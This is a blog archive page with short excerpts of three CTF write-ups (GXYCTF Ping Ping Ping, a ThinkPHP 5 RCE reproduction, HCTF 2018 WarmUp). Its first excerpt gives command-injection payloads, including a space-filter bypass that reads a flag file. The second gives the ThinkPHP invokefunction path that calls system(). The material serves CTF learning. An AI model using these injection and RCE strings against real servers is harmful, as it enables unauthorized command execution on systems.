05 2022 档案

buuctf刷题
摘要:[GXYCTF2019]Ping Ping Ping 这还是一道命令执行的题目 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag 这里提示我们空格被过滤了 我们开始构建合适的payload ?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.ph 阅读全文
posted @ 2022-05-10 22:44 smart_ql 阅读(24) 评论(0) 推荐(0) 编辑
CVE漏洞复现(代码执行漏洞)
摘要:命令执行CVE [ThinkPHP]5-Rce 打开题目发现是thinkphp5 thinkphp5有一个代码执行漏洞我们百度可以知道只要在?后面加上index/think\app/invokefunction&function=call_user_func_array&vars[0]=system 阅读全文
posted @ 2022-05-09 01:17 smart_ql 阅读(163) 评论(0) 推荐(0) 编辑
CTF刷题01
摘要:[HCTF 2018]WarmUp 打开之后发现是一个滑稽 审查源码发现source.php 打开souce.php发现是一道代码审计题目 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$ 阅读全文
posted @ 2022-05-08 15:33 smart_ql 阅读(146) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示